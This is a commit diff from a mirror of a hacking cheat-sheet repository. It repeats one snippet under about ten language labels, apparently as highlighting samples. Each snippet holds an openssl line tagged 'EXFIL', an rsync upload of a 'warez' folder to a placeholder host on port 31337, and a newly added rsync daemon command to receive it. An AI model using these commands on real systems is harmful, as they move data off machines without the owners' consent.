mirror of
https://github.com/hackerschoice/thc-tips-tricks-hacks-cheat-sheet.git
synced 2026-07-10 20:53:43 +02:00
list
This commit is contained in:
@@ -3,6 +3,7 @@ applescript
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
rsync --daemon --port=31337 --config=r.conf --no-detach
|
||||
```
|
||||
|
||||
elixir
|
||||
@@ -10,6 +11,7 @@ elixir
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
rsync --daemon --port=31337 --config=r.conf --no-detach
|
||||
```
|
||||
|
||||
julia
|
||||
@@ -17,6 +19,7 @@ julia
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
rsync --daemon --port=31337 --config=r.conf --no-detach
|
||||
```
|
||||
|
||||
livescript
|
||||
@@ -24,6 +27,7 @@ livescript
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
rsync --daemon --port=31337 --config=r.conf --no-detach
|
||||
```
|
||||
|
||||
pgsql
|
||||
@@ -31,6 +35,7 @@ pgsql
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
rsync --daemon --port=31337 --config=r.conf --no-detach
|
||||
```
|
||||
|
||||
php
|
||||
@@ -38,6 +43,7 @@ php
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
rsync --daemon --port=31337 --config=r.conf --no-detach
|
||||
```
|
||||
|
||||
powershell
|
||||
@@ -45,6 +51,7 @@ powershell
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
rsync --daemon --port=31337 --config=r.conf --no-detach
|
||||
```
|
||||
|
||||
r
|
||||
@@ -52,6 +59,7 @@ r
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
rsync --daemon --port=31337 --config=r.conf --no-detach
|
||||
```
|
||||
|
||||
ruby
|
||||
@@ -59,6 +67,7 @@ ruby
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
rsync --daemon --port=31337 --config=r.conf --no-detach
|
||||
```
|
||||
|
||||
sql
|
||||
@@ -66,4 +75,5 @@ sql
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
rsync --daemon --port=31337 --config=r.conf --no-detach
|
||||
```
|
||||
|
||||
Reference in New Issue
Block a user